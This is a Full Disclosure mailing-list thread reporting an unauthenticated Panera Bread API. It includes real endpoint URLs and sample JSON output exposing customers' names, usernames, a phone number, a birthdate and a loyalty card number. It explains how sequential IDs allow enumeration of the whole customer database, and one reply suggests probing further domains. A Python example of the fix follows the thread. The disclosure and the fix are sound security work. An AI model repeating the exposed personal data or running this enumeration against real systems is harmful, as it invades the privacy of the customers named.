Message-ID: <NDJIABTgrEpp3lXxGP0Pd787uqyhl4EwkLHXdcx31ni5HvdJNMRQWLbIDZeDfkcxzOdftL2C-js9yNrUHAoWQP9nEnnYROhvt2ZdB1I5vXc=@syn.agency>
Date: Tue, 03 Apr 2018 15:21:13 -0400
From: John Menerick <john@....agency>
To: "(RS) Tyler Schroder" <redorhcs@...coded.com>, Jack Beanstalk <pnrabrdthrwy@...il.com>, "fulldisclosure@...lists.org" <fulldisclosure@...lists.org>
Subject: Re: [FD] Massive Breach in Panera Bread

They didn't fix the other domains from resolving their weblogic / Hyperion site. Try catering, etc.....

Sent from ProtonMail Mobile

On Tue, Apr 3, 2018 at 11:17, (RS) Tyler Schroder <redorhcs@...coded.com> wrote:

> A correction seems to be issued for both endpoints, POC links are returning "INVALID_SESSION". Might still be breakable given some time, but something tells me they're getting a lot of free pentesting right now :)

R. S. Tyler Schroder

-----Original Message-----
From: Fulldisclosure [mailto:fulldisclosure-bounces@...lists.org] On Behalf Of Jack Beanstalk
Sent: Monday, April 2, 2018 3:43 PM
To: fulldisclosure@...lists.org
Subject: [FD] Massive Breach in Panera Bread

7682200f0cd27a4f1a3c2301941d959aae7abf89136c38a4f1ded4d2bb7a67d7

I'd like to report a security vulnerability in Panera Bread's web application. There is a publicly available, completely unauthenticated API endpoint that allows anyone to access the following information about anyone who has ever signed up for an account to order food from Panera Bread:

1. Username
2. First and last name
3. Email address
4. Phone number
5. Birthday
6. Last four digits of saved credit card number
7. Saved home address
8. Social account integration information
9. Saved user food preferences and dietary restrictions

Here are the API endpoints which you can use to verify this information:

1. https://delivery.panerabread.com/foundation-api/users/by-phone/9140000000

This returns the following JSON:

{"accounts": [
  {"username":"denys","name":"romona ruiz","cardNumber":"********6515"},
  {"username":"mhmulcahy@...mail.com","name":"Marie Mulcahy","cardNumber":"********5527"},
  {"username":"fenrny@....com","name":"F B","cardNumber":"********7921"},
  {"username":"sabooky1@...oo.com","name":"C Davis","cardNumber":"********7108"},
  {"username":"jorgeialcalde","name":"Jorge Alcalde","cardNumber":"********6129"},
  {"username":"ktennister37@....com","name":"Kei Kino","cardNumber":"********6061"},
  {"username":"gettingbetter812@...oo.com","name":"jan jones","cardNumber":"********8950"},
  {"username":"kennny","name":"kenny poteat","cardNumber":"********4412"},
  {"username":"angelo151","name":"angelo ianello","cardNumber":"********8386"},
  {"username":"dblaperch@....com","name":"Deborah LaPerch","cardNumber":"********5384"},
  {"username":"bagnoni1@...online.net","name":"sadie bagnoni","cardNumber":"********5144"},
  {"username":"arsbreva@...mail.com","name":"Marea needle","cardNumber":"********7488"},
  {"username":"contessa1234","name":"CONTESSA SLEDGE","cardNumber":"********6702"},
  {"username":"lindapam","name":"elizabeth forlenzo","cardNumber":"********7085"},
  {"username":"jue-95@...mail.com","name":"juline G","cardNumber":"********4220"},
  {"username":"gleuanter","name":"Leo Zinder","cardNumber":"********9123"},
  {"username":"artlaura","name":"arthur hanson","cardNumber":"********8139"},
  {"username":"dlongua","name":"denise longua","cardNumber":"********0102"},
  {"username":"homestead19-86@....com","name":"Sandra Baglione","cardNumber":"********6851"},
  {"username":"kilsha22","name":"kicia fulchek","cardNumber":"********2654"}
]}

Note that you can look up usernames/email addresses for Panera Bread accounts if you know the target's phone number. This returns the username/email address and last four digits of the saved credit card of every user who has ever signed up with that phone number.

2. https://delivery.panerabread.com/foundation-api/users/uramp/7382194

This returns the following JSON:

{
  "customerId": 7382194,
  "username": "abcascio@....net",
  "firstName": "Anthony",
  "lastName": "Cascio",
  "loyalty": {"cardNumber": "603077990852"},
  "emails": [
    {"id": 23860763, "emailAddress": "abcascio@....net", "emailType": "Personal",
     "isDefault": true, "isOpt": true, "isVerified": true}
  ],
  "phones": [
    {"id": 18295989, "phoneNumber": "7032662951", "phoneType": "Residential",
     "countryCode": "1", "extension": null, "name": null, "isSmsOpt": false,
     "isCallOpt": false, "isDefault": true, "isValid": true,
     "smsPreferences": [{"programName": "Delivery", "isOpt": false, "isOptPending": false}]}
  ],
  "isSmsGlobalOpt": false,
  "isEmailGlobalOpt": true,
  "isMobilePushOpt": false,
  "birthDate": {"birthDay": "25", "birthMonth": "05", "birthYear": "1948"},
  "userPreferences": {
    "foodPreferences": [{"code": 3, "displayName": "Low Fat"}],
    "gatherPreference": {"code": 7, "displayName": "Meal with family"}
  },
  "subscriptions": {
    "subscriptions": [
      {"subscriptionCode": 1, "displayName": "Reward Reminders & Expiration Alerts",
       "isSubscribed": false, "tncVersion": null},
      {"subscriptionCode": 2, "displayName": "Panera Bread Updates & Special Offers",
       "isSubscribed": false, "tncVersion": null}
    ],
    "suppressors": [
      {"suppressionCode": 1, "displayName": "Catering", "isSuppressed": false},
      {"suppressionCode": 2, "displayName": "CPG", "isSuppressed": false}
    ]
  },
  "addresses": [],
  "paymentOptions": {"creditCards": [], "payPals": [], "giftCards": [], "corporateCateringAccounts": []},
  "taxExemptions": null,
  "socialIntegration": null,
  "favoriteCafes": []
}

In this context, "7382194" is the user's account ID. Panera Bread uses sequential integers for account IDs, which means that if your goal is to gather as much information as you can instead about someone, you can simply increment through the accounts and collect as much as you'd like, up to and including the entire database.

Hopefully they'll fix this if it gets enough attention.
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
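The root cause described in the thread is a user-record endpoint that checks neither a session nor whether the requested customerId belongs to the caller, so sequential IDs walk the whole table. The following is an added illustration of that missing object-level authorization check, not Panera's code or anything from the thread; the handler shapes, the session store and the sample records are hypothetical and constructed for the example.

```python
"""Object-level authorization for a user-profile lookup (added example).

Models the two endpoints from the post:
  GET /foundation-api/users/uramp/<customerId>
  GET /foundation-api/users/by-phone/<phone>
The 'before' handler answers any id with no session check at all; the
hardened handlers require a session, serve only the caller's own record,
return 404 (not 403) for foreign ids so existence cannot be probed, and
mask the card number even for the owner. Everything here is hypothetical.
"""
from typing import Optional, Tuple

# Constructed sample records; field names mirror the JSON shape in the post.
USERS = {
    7382194: {"customerId": 7382194, "username": "alice@example.invalid",
              "phoneNumber": "9140000000", "cardNumber": "1111222233336515"},
    7382195: {"customerId": 7382195, "username": "bob@example.invalid",
              "phoneNumber": "9140000000", "cardNumber": "4444555566667921"},
}
# Hypothetical session store: opaque bearer token -> authenticated customerId.
SESSIONS = {"tok-alice": 7382194}


def lookup_user_vulnerable(customer_id: int) -> Optional[dict]:
    """Before: no session, no ownership check. Any integer returns a record."""
    return USERS.get(customer_id)


def lookup_user_hardened(token: Optional[str], customer_id: int) -> Tuple[int, Optional[dict]]:
    """After: (status, body). 401 without a session, 404 unless the id is the
    caller's own, and the card number masked to its last four digits."""
    caller = SESSIONS.get(token or "")
    if caller is None:
        return 401, None
    if customer_id != caller or customer_id not in USERS:
        return 404, None
    rec = dict(USERS[customer_id])
    rec["cardNumber"] = "*" * 8 + rec["cardNumber"][-4:]
    return 200, rec


def lookup_by_phone_hardened(token: Optional[str], phone: str) -> Tuple[int, Optional[dict]]:
    """Phone lookup with the same rule: it can only confirm the caller's own
    record, never enumerate other accounts that share a phone number."""
    caller = SESSIONS.get(token or "")
    if caller is None:
        return 401, None
    rec = USERS.get(caller)
    if rec is None or rec["phoneNumber"] != phone:
        return 404, None
    return 200, {"username": rec["username"]}
```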